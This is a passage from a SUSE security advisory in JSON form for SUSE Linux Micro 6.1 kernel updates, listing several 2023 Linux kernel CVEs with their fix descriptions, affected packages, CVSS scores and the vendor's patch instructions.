"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53992"
},
{
"cve": "CVE-2023-53994",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53994"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nionic: remove WARN_ON to prevent panic_on_warn\n\nRemove unnecessary early code development check and the WARN_ON\nthat it uses. The irq alloc and free paths have long been\ncleaned up and this check shouldn\u0027t have stuck around so long.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53994",
"url": "https://www.suse.com/security/cve/CVE-2023-53994"
},
{
"category": "external",
"summary": "SUSE Bug 1255570 for CVE-2023-53994",
"url": "https://bugzilla.suse.com/1255570"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53994"
},
{
"cve": "CVE-2023-53995",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53995"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv4: fix one memleak in __inet_del_ifa()\n\nI got the below warning when do fuzzing test:\nunregister_netdevice: waiting for bond0 to become free. Usage count = 2\n\nIt can be repoduced via:\n\nip link add bond0 type bond\nsysctl -w net.ipv4.conf.bond0.promote_secondaries=1\nip addr add 4.117.174.103/0 scope 0x40 dev bond0\nip addr add 192.168.100.111/255.255.255.254 scope 0 dev bond0\nip addr add 0.0.0.4/0 scope 0x40 secondary dev bond0\nip addr del 4.117.174.103/0 scope 0x40 dev bond0\nip link delete bond0 type bond\n\nIn this reproduction test case, an incorrect \u0027last_prim\u0027 is found in\n__inet_del_ifa(), as a result, the secondary address(0.0.0.4/0 scope 0x40)\nis lost. The memory of the secondary address is leaked and the reference of\nin_device and net_device is leaked.\n\nFix this problem:\nLook for \u0027last_prim\u0027 starting at location of the deleted IP and inserting\nthe promoted IP into the location of \u0027last_prim\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53995",
"url": "https://www.suse.com/security/cve/CVE-2023-53995"
},
{
"category": "external",
"summary": "SUSE Bug 1255616 for CVE-2023-53995",
"url": "https://bugzilla.suse.com/1255616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53995"
},
{
"cve": "CVE-2023-53996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/sev: Make enc_dec_hypercall() accept a size instead of npages\n\nenc_dec_hypercall() accepted a page count instead of a size, which\nforced its callers to round up. As a result, non-page aligned\nvaddrs caused pages to be spuriously marked as decrypted via the\nencryption status hypercall, which in turn caused consistent\ncorruption of pages during live migration. Live migration requires\naccurate encryption status information to avoid migrating pages\nfrom the wrong perspective.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53996",
"url": "https://www.suse.com/security/cve/CVE-2023-53996"
},
{
"category": "external",
"summary": "SUSE Bug 1255618 for CVE-2023-53996",
"url": "https://bugzilla.suse.com/1255618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53996"
},
{
"cve": "CVE-2023-53997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nthermal: of: fix double-free on unregistration\n\nSince commit 3d439b1a2ad3 (\"thermal/core: Alloc-copy-free the thermal\nzone parameters structure\"), thermal_zone_device_register() allocates\na copy of the tzp argument and frees it when unregistering, so\nthermal_of_zone_register() now ends up leaking its original tzp and\ndouble-freeing the tzp copy. Fix this by locating tzp on stack instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53997",
"url": "https://www.suse.com/security/cve/CVE-2023-53997"
},
{
"category": "external",
"summary": "SUSE Bug 1255632 for CVE-2023-53997",
"url": "https://bugzilla.suse.com/1255632"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53997"
},
{
"cve": "CVE-2023-53998",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53998"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwrng: virtio - Fix race on data_avail and actual data\n\nThe virtio rng device kicks off a new entropy request whenever the\ndata available reaches zero. When a new request occurs at the end\nof a read operation, that is, when the result of that request is\nonly needed by the next reader, then there is a race between the\nwriting of the new data and the next reader.\n\nThis is because there is no synchronisation whatsoever between the\nwriter and the reader.\n\nFix this by writing data_avail with smp_store_release and reading\nit with smp_load_acquire when we first enter read. The subsequent\nreads are safe because they\u0027re either protected by the first load\nacquire, or by the completion mechanism.\n\nAlso remove the redundant zeroing of data_idx in random_recv_done\n(data_idx must already be zero at this point) and data_avail in\nrequest_entropy (ditto).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53998",
"url": "https://www.suse.com/security/cve/CVE-2023-53998"
},
{
"category": "external",
"summary": "SUSE Bug 1255578 for CVE-2023-53998",
"url": "https://bugzilla.suse.com/1255578"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53998"
},
{
"cve": "CVE-2023-53999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53999"
}
],
"notes": [
{
"category": "general",
